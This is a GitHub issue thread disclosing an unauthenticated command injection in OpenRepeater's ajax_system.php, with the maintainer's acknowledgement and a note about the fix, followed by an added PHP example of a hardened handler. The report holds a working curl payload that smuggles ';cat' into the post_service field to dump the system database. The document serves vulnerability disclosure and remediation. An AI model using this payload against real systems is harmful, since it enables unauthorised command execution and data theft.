Unauthenticated Command Injection Flaw #66

Closed
codexlynx opened this issue Mar 6, 2019 · 2 comments
@codexlynx

An unauthenticated malicious actor can execute arbitrary system commands via "functions/ajax_system.php". This has a critical impact on the security of the system, for example:

  • Download system database:

$ curl <ADDRESS>/openrepeater/functions/ajax_system.php --data "post_service=;cat /var/lib/openrepeater/db/openrepeater.db" > openrepeater.db

The only limit is imagination.

Regards!

@abcrawford
Contributor

Just wanted to reply and acknowledge that we have seen this. I have tested and reproduced your results. While the chances of an attack on one of these setups are likely slim, we will be looking at ways to address this in a future release. Thanks for your diligence.

@abcrawford
Contributor

This should be corrected/improved. The code inside the PHP file is now wrapped inside of a session check to ensure that the user is logged in before it will execute the code. Commit 3f31127 has been applied to 2.2.x branch.
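
An added example, not the project's code and not the contents of commit 3f31127: a session check like the one described in the comment above closes the unauthenticated path, and this example pairs it with an exact-match allow-list and `escapeshellarg` for the `post_service` value so that a logged-in request cannot inject either. The session key `logged_in`, the service names and the `systemctl restart` command are assumptions made for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical allow-list: the only service names this endpoint may act on.
const ALLOWED_SERVICES = ['svxlink', 'example-web'];

/**
 * Build the command for a request, or return null when it must be rejected.
 * $session and $post stand in for $_SESSION and $_POST so the logic can be
 * exercised from the CLI without a web server.
 */
function build_command(array $session, array $post): ?string
{
    // 1. Session check: nothing runs for a caller who is not logged in.
    if (empty($session['logged_in'])) {      // 'logged_in' is an assumed key
        return null;
    }
    // 2. Allow-list: exact string match, so shell metacharacters never pass.
    $service = $post['post_service'] ?? null;
    if (!is_string($service) || !in_array($service, ALLOWED_SERVICES, true)) {
        return null;
    }
    // 3. Defence in depth: quote the argument even though it is allow-listed.
    return 'systemctl restart ' . escapeshellarg($service);
}

// Constructed sample requests (not captured traffic).
$injected = ';cat /var/lib/openrepeater/db/openrepeater.db';
$cases = [
    'no session, injected value'    => [[], ['post_service' => $injected]],
    'logged in, injected value'     => [['logged_in' => true], ['post_service' => $injected]],
    'logged in, array instead of string' => [['logged_in' => true], ['post_service' => ['svxlink']]],
    'logged in, allowed service'    => [['logged_in' => true], ['post_service' => 'svxlink']],
];

foreach ($cases as $label => [$session, $post]) {
    $cmd = build_command($session, $post);
    printf("%-36s => %s\n", $label, $cmd ?? 'rejected (HTTP 403)');
}
```

Only the last case produces a command; the injected value is rejected both with and without a session, which is the gap a session check alone leaves open for authenticated callers.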
